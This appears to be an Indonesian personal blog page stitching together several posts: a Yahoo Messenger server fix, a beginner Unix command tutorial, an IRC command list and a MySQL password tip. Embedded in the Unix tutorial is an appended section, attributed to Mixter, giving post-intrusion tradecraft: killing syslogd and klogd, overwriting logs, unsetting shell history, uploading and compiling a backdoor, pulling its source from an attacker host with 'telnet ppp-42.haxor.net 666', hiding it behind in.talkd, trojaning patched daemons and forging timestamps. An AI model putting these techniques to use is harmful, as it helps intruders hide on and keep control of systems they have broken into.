fajar

Dari tanggal sekian-sekain ( lupa tanggalnya hehe ) nyobain buat connect lwat Gyache g bisa2, bgitu jg dengan pidgin.. ribet dah g bisa chatting ma temen2.. akhirnya cari solusi lain, yaitu dengan menggunakan kopete tapi ya itu.. susah deh.. coz connect dengan kopete cukup berat

Bosen sama situasi kek gini akhirnya ak serahin deh sama si mbah google buat nyari solusinya.. ternyata nemuin jg masalahnya disini

Tricknya yaitu tinggal ganti servernya yang asalnya scs.msg.yahoo.com diganti dengan  cn.scs.msg.yahoo.com

Buat amatiran… kek aku yg msh awam soal tracing photo.. ini mrupakan hal yg bikin seneng.. mayan dahbuat nambah ilmu dan sekedar menyalurkan hobi..

Dasar-dasar Perintah Unix

Jasakom – Tentu Rekan – Rekan Sekalian ingin Mengatahui sebagian Perintah Unix? pada berbagai Clone Unix (BSD,Linux,Sunos,System V,SCO,IRIX,AIX) hampir mempunyai persamaan satu sama lain nya. Sebagai Contoh saya berikan Cara menjalankan perintah Linux ini sebagian saya ambil dari tutorial Kecoak Elektronik dan Perintah Jitu dari HAcker Israel yaitu Mixter

:: Tutorial CyberBug

PERINTAH-PERINTAH UNIX

Sebelum lanjut perlu diingat bahwa di Linux/UNIX semua perintah ditulis dalam huruf kecil,dan Linux/UNIX membedakan huruf besar dan kecil.

——> ls
Ingat perintah DIR di DOS? … nah perintah ini sama dgn DIR, gunanya untuk menampilkan ‘list’ file di dalam directory. Perintah ls juga dilengkapi dengan flag tambahan yang bisa di lihat dengan mengetik :

ls –help ; menampilkan bantuan
man ls ; man bisa juga diartikan manual, jadi manual ls

Beberapa perintah ls yang umum adalah :

ls -l ; menampilkan informasi tambahan (l = long)
ls -a ; menampilkan hidden file (a = attribute)
ls -la

Informasi tambahan yang ditampilkan oleh flag -l menyangkut user yang memiliki ‘owns’, file tanggal dan jam file itu dibuat, hak/permissions file, dan informasi lain, contoh :

rwxr-x–x

Catatan :
karakter 1-3: user/owner permissions
karakter 4-6: group permissions
karakter 7-8: other permissions

This is what the letters mean:

r – read, permissions utk ‘baca’
w – write, permission utk ‘tulis’
x – (e)xecute, permission utk ‘menjalankan’

Jadi pada contoh diatas :

user/owner dapat read/baca, write/tulis dan execute/jalankan file yg satu group dgn user/owner dpt read/baca, execute/jalankan file
user lain dapat execute/menjalankan file tsb – berarti permission tidak ada, jika ada d sebelum permission berarti itu adalah directory

——> cat
Cat atau concatenate dipakai untuk menampilkan dan menulis/membuat file, kira-kira sama dengan perintah TYPE di DOS. Untuk menampilkan isi file ketik : “cat ” Untuk membuat file ketik : “cat > ” ketik isi file dan utk menyimpan tekan CTRL + C atau CTRL + D kalau namafile sudah ada file tersebut akan ditimpa, jika kita ingin data ditambahkan kefile yang
sudah ada ganti > dengan >>

——> more
Menampilkan isi dari file, perlayar, tekan q untuk quit more jilid1.txt

——> grep
Menampilkan semua baris yang mengandung pola yang diinginkan grep kecoak jilid1.txt akan menampilkan semua baris teks yang mengandung kecoak di file jilid1.txt

——> man
UNIX help/manual, ketik : man untuk eksekusi.
man pwd

——> echo
echo dipakai utk menampilkan apa yang kita ketik di layar, seperti :

echo “saya belajar linux”
saya belajar linux

atau untuk membuat file, seperti :

echo “biff n” > .profile

yang akan membuat file .profile di directory aktif yg berisi teks “biff n” atau menambah file isi file dgn mengganti > dengan >>

——> cp
copy, dipakai untuk mengcopy file.

cp jilid1.txt jilid1.txt.backup
cp jilid1.txt ~cyberbug/backup/jilid1.txt.backup

——> mv
move, mengganti nama file atau directory

mv jilid1.txt jilid1a.txt
mv backup bak

——> rm
remove, hapus file

rm jilid1.txt ; hapus file jilid1.txt
rm * ; hapus semua file di directory aktif (hati-hati!)

——> cd
change directory, dipakai untuk pindah directory, sama dengan perintah CD di DOS

cd /root

perhatikan bahwa di Linux yang digunakan adalah / (slash) bukan \ (backslash)

——> mkdir
make directory, membuat directory

mkdir backup

——> rmdir
remove directory, hapus directory, file-file dalam directory harus dihapus dulu sebelum menghapus directory.

rmdir backup

——> who
who digunakan untuk menampilkan user yang login ke system, hasilnya kira-kira sebagai berikut :

cyberservices:~$ who
root tty1 Dec 20 17:47
cyberbug tty2 Dec 20 17:48
cyberbug tty3 Dec 20 17:48
cyberbug ttyp0 Dec 20 18:43 (localhost)

Kolom pertama menunjukkan nama user yang login, kolom kedua menunjukkan terminal line yang digunakan, kolom ketiga menunjukkan waktu login dan kolom keempat menunjukkan domain atau IP asal mereka koneksi, jika kosong berarti mereka main langsung dari console.

——> whoami
Kalo lupa diri ini perintahnya : Siapakah Aku?

cyberservices:~$ whoami
cyberbug

——> who am i
Ini juga kalo sudah lupa daratan )

cyberservices:~$ who am i
cyberservices!cyberbug tty3 Dec 20 17:48

——> pwd
Tampilkan directory aktif, pwd = print working directory, perintah yang dipakai kalo saat
jalan2, sudah gak tau mo pulang lewat mana

cyberservices:~$ pwd
/home/cyberbug

——> ps
Menampilkan proses yang aktif

cyberservices:~$ ps
PID TTY STAT TIME COMMAND
87 2 S 0:00 -bash
88 3 S 0:00 -bash
1440 2 S 0:00 pico jilid2.txt
1443 3 R 0:00 ps

——> ping
Mengecek host apakah ‘up’ utk istilah teknisnya silakan ‘man ping’

cyberservices:~$ ping localhost
PING localhost (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.2 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.1 ms

— localhost ping statistics —
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 0.1/0.1/0.2 ms
cyberservices:~$ ping 127.0.0.1
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.2 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.1 ms

— 127.0.0.1 ping statistics —
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 0.1/0.1/0.2 ms
cyberservices:~$

Perhatikan bahwa localhost dan 127.0.0.1 adalah sama
127.0.0.1 adalah local loopback yang disediakan untuk testing.

——> finger

Mencari informasi user

cyberservices:~$ finger
Login Name Tty Idle Login Time Office Office Phone
cyberbug CyberBug 2 Dec 22 01:10
cyberbug CyberBug 3 Dec 22 01:10
root 1 1:37 Dec 22 01:10

cyberservices:~$ finger @cyberservices.com
[cyberservices.com]

Welcome to Linux version 2.0.34 at cyberservices.com !

3:46am up 2:37, 3 users, load average: 0.00, 0.00, 0.00

Login Name Tty Idle Login Time Office Office Phone
cyberbug CyberBug 2 Dec 22 01:10
cyberbug CyberBug 3 Dec 22 01:10
root 1 1:39 Dec 22 01:10

cyberservices:~$ finger @localhost
[localhost]

Welcome to Linux version 2.0.34 at cyberservices.com !

3:47am up 2:38, 3 users, load average: 0.00, 0.00, 0.00

Login Name Tty Idle Login Time Office Office Phone
cyberbug CyberBug 2 Dec 22 01:10
cyberbug CyberBug 3 Dec 22 01:10
root 1 1:40 Dec 22 01:10

cyberservices:~$ finger cyberbug
Login: cyberbug Name: CyberBug
Directory: /home/cyberbug Shell: /bin/bash
On since Tue Dec 22 01:10 (PHT) on tty2 8 seconds idle
On since Tue Dec 22 01:10 (PHT) on tty3
Last login Tue Dec 22 01:13 (PHT) on tty4
Mail forwarded to “|IFS=’ ‘&&exec /usr/bin/procmail -f-||exit 75
#cyberbug”
No mail.
No Plan.

cyberservices:~$ finger root
Login: root Name:
Directory: /root Shell: /bin/bash
On since Tue Dec 22 01:10 (PHT) on tty1 1 hour 42 minutes idle
Mail last read Tue Dec 15 09:19 1998 (PHT)
No Plan.

——> telnet
Melakukan komunikasi dengan host lain melalui telnet protocol

cyberservices:~$ telnet localhost
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.

Welcome to Linux 2.0.34.

cyberservices login: cyberbug
Password: 3m4nggu3p1k1r1n
Linux 2.0.34.
Last login: Tue Dec 22 01:13:52 on tty4.
No mail.

cyberservices:~$ telnet localhost 25
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
220 cyberservices.com ESMTP Sendmail 8.9.0/8.9.0; Tue, 22 Dec 1998
03:52:51 +0800
helo darling
250 cyberservices.com Hello cyberbug@localhost [127.0.0.1], pleased to
meet you
mail from: guest@cyberservices.com
250 guest@cyberservices.com… Sender ok
rcpt to: untukmu@seorang.jauh.disana
250 untukmu@seorang.jauh.disana… Recipient ok (will queue)
data
354 Enter mail, end with “.” on a line by itself
Kukirim lagu dan salam rinduku
.
250 EAA01615 Message accepted for delivery
quit

cyberservices:~$ telnet localhost 110
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
+OK cyberservices POP3 Server (Version 1.005l) ready at
user root
+OK please send PASS command
pass 3m4nggu3p1k1r1n
+OK 2 messages ready for root in /usr/spool/mail/root
stat
+OK 2 7227
retr 1
quit

——> ftp
Menggunakan file tranfer program

cyberservices:~$ ftp localhost
Connected to localhost.
220 cyberservices.com FTP server (Version wu-2.4.2-academ[BETA-15](1) Wed
May 20 13:45:04 CDT 1998) ready.
Name (localhost:cyberbug): ftp
331 Guest login ok, send your complete e-mail address as password.
Password: cyberbug@k-elektronik.org
230-Welcome, archive user! … blah
blah … blah
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

ftp juga bisa dilakukan dengan melakukan telnet ke port 21

cyberservices:~$ telnet localhost 21
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
220 cyberservices.com FTP server (Version wu-2.4.2-academ[BETA-15](1) Wed
May 20 13:45:04 CDT 1998) ready.

——> talk
Berbicara dengan user lain, misalnya cyberbug request talk ke root sbb:

talk root
atau
talk root@cyberservices.com

[Waiting for your party to respond]

[Ringing your party again]

Di terminal root akan muncul pesan :

Message from Talk_Daemon@cyberservices at 4:00 …
talk: connection requested by cyberbug@localhost.
talk: respond with: talk cyberbug@localhost

root harus mengetik talk cyberbug@localhost jika ingin menjawab request
talk cyberbug@localhost

[Connection established]

:: Perintah Tambahan dari Saya ( r3v0lt aka Intruded)

1. Perintah Untuk Kompilasi File

ex. #gcc -o namafile filekompilasi
#gcc -o pscan pscan.c
2. Perintah Running file eksekusi
ex. #./file
#./pscan
#./scaner.pl
#./scanner.sh
3. Perintah Hentikan proses
ex.# Ctrl+c
4. Perintah Proses sementara
ex.#ctrl+z ,balik ke shell ketik fg (pada FreeBSD)
5. Perintah ganti Shell (pada FreeBSD)
ex.#chsh —> ksh,bash,tcsh
6. Perintah Ganti Passwd
ex.#passwd
7. Perintah melihat ip suatu host
ex.#dig ip
ex.#nslookup ip
8. Perintah editor
ex.#pico wepedodol.c
9. perintah pipa, dua proses sekaligus
ex.# ls -al |head file
akan menanmpilakn direktori bagian atas nya saja
10.perintah ganti mode
ex.#chmod +x file
r – read, permissions utk ‘baca’
w – write, permission utk ‘tulis’
x – (e)xecute, permission utk ‘menjalankan’
:: Begitu aja dolo yaaa ok say…..

::: Keterangan Lae Kita Mixter =
Here are my suggestions…

1. killall -9 syslogd klogd – pesky loggers! only few admins will notice if they get turned off. Now you can act freely.
copy secure.1 and messages.1 from /var/log over secure and messages Normally, these logs are the only ones with the intruders IP
and traces of a root compromise in them. If *.1 doesn’t exist, truncate the files. Also, unset HISTFILE is important.
Nobody does unset HISTFILE, thus leaving a .bash_history in /var/named or even /. Very unprofessional .

2. uname -a, w, last -10, cat /etc/passwd /etc/inetd.conf… Inform yourself about the frequency the system is being
maintained, administrated, if the logfiles are being analyzed.
* Look how many people have access to it (/etc/passwd) – the more the better for you (keeps attention away from you).
* Look if the system is already backdoored!! you might want to remove other backdoors.
* Look for a loghost or snmp (dangerous because you cant manipulate the logs on a far-away loghost). Watch out for *logd, sniffers,
netmon’s etc before you do anything great on the host. If you are paranoid, traceroute the host, and see if non-routers are before that host (probably IDS, loghost, sniffer, etc).

3. This is important: DONT MANIPULATE THE SYSTEM CONFIGURATION! DOH!
It is too easy to detect you if you add yourself to /etc/passwd, or open a port by manipulating inetd.conf. Let me tell you that
root kits and /bin/login trojans are the first things any sane admin will watch for. Install a nice stealthy port backdoor. My approach
to uploading files is doing:
(on your box)

$ uuencode -m backdoor.c backdoor.c | less

(on the target box)
uudecode

# cc -o backdoor backdoor.c
A nice different method is putting a daemon on your own box, on port 666, that spits out the source code when someone telnets to
it, so you can do telnet ppp-42.haxor.net 666 > backdoor.c As I said, make sure you can get back in. If the box you rooted
has an uptime of more than 300 days or so, you might consider not installing the backdoor for startup. Instead, kill the
vulnerable daemon, and when the host restarts, come back using an exploit. Normally, you can replace a lame daemon that nobody uses
with your backdoor. Look at inetd.conf to see what daemons are active. A safe bet is in.talkd which often is activated but seldom
ever used. So, when you want to re-activate your backdoor, talk root@0wned.host.com for a second, and your backdoor is running.
You can also add /path/to/backdoor to /root/.profile.. but it is a bit riskier than the inetd backdoor method.

4. Subscribe to bugtraq, CIAC security list, or look at rootshell, to see what you need to do to patch your buggy stuff. If RPM is
installed you can try a rpm -U ftp://ftp.cdrom.com/rightdir/daemon.rpm If not, use ncftp to fetch the file anonymously, because it doesn’t need user interaction. If you want, add an additional backdoor in your “patched” server. QPOP 2.53 even supports this itself.
For all files you replace, you should modify the time stamps, which wont help, if the admin uses tripwire or cksum, but if the
admin is, like most admins, a complete lamer that does find / -ctime to scan for trojans and thinks he knows his job.
To modify timestamps, you do a simple:

touch -r /bin/bash /path/to/your/trojan

this will copy the exact date/time info from /bin/bash over your freshly added trojan. Voila! The alternative to all this for lazy people is, to add a ipfwadm rule that prevents traffic from the outside (-W eth0) to the ports with the buggy daemons, and adding that command
to a rc.d script as well. Bind doesn’t need tcp port 53 for anything except zone transfers and the RoTShB/ADM bind exploits. It works
fine with 53/tcp firewalled. But be aware that this might get you detected, lets say if you disable port 110 or 143 on an ISP’s
central mail exchange server…

About your backdoor:
Port > 10000 is strongly recommended, also a backdoor using UDP, ICMP, or even something as unusual as raw IP is very useful.
People that bind /bin/sh to a port are idiots, because they open that host to everyone, letting in sniffers, and probably other people who may damage the host seriously. Make sure to password protect everything that runs as root. A password of a minimum length of 8 characters, because you have no way of detecting a brute force attack. For the C programmers, let me say, listen(sockfd,1). Maybe 2 connections, but not more.

For comfortability, you can add some stuff you want to occur on each successful backdoor login, like system(”w”), system(”killall -9 syslogd klogd”), or whatever. If you want a front-end backdoor with some integrated functions, try gateway[5].

——————————————————————————————
..::: JasaKom :::..

r3v0lt
aka Intruded

* http://private.localbox.net (staff only – no link)
* http://published.localbox.net (free exploits – k00lz
* http://restriction.localbox.net (staff only – no link)

Credit Mixter & CyberBug (was confirmation Sept 2001)
File = Public ! or MaYBe go to: http://published.localbox.net
————————————————————-

/*
Dipersilahkan untuk mengkopi paste dan menyebarluaskan secara tak terbatas
artikel ini asal dengan tujuan pendidikan dan menyertakan credit atas
r3v0lt aka Intruded. Penulis dan editor tidak bertanggung jawab atas
penyalahgunaan versi pendidikan artikel ini.
*/

Panduan Chat mIRC, x-Chat DalNet
BERIKUT INI ADALAH PANDUAN CHAT DI IRC

Kumpulan perintah umum DAL.NET

Perintah dasar DAL.NET :

/nick (nick baru) = mengganti nickname anda
/notice (nick) (pesan) = notice ke nick
/join (#channel) = masuk chennel
/say (pesan) = seperti chat biasa
/part (#channel) = keluar dari channel
/msg (nick) (pesan) = kirim msg ke nick
/quit = keluar dari IRC
/notify (nick) = agar tau nick tersebut online / tidak
/notify – (nick) = menghilangkan (nick) dari notify list
/quit (pesan) = quit dengan pesan kamu
/server (nama server) = ganti server
/query (nick) = private msg ke user
/invite (nick) (#channel) = invite user
/dcc chat (nick) = dcc chat ke nick
/dcc send (nick) (filename) = kirim file
/mode (nick kamu) +I = ubah mode menjadi invisible (tidak kelihatan di /who #channel oleh orang)
/ignore (nick) atau /ignore *@IPnya = abaikan user, semua tulisannya tidak akan kita lihat
/me (pesan) = action, hasilnya *(nick) (pesan)
untuk diminculkan ke semua channel yang kita OL
/list = melihat list semua chennel
/who (nick/#channel) = melihat keterangan user atau chennel
/whois (nick) = melihat keterangan ttg user
/away (pesan) = pergi sesaat dengan pesan
/away = menyatakan balik dari away
/ctcp (nick) ping = periksa berapa lama ketikan kamu sampai ke user
/ctcp (nick kamu) ping = cek lag kamu sendiri
/uwho (nick) = melihat U central nick
/clear = bersihkan layar aktif

read more »

Setelah install MySQL di ubuntu hardy, e.. ada satu masalah waktu instalasi ternyata ga minta password.. ribet jg deh.. setelah browsing sana sini, akhirnya nemu jg deh…

Ketikan command dibawah pd terminal

sudo dpkg-reconfigure mysql-server-5.0

Abis kluar tu, masukin deh password barunya..trus Enter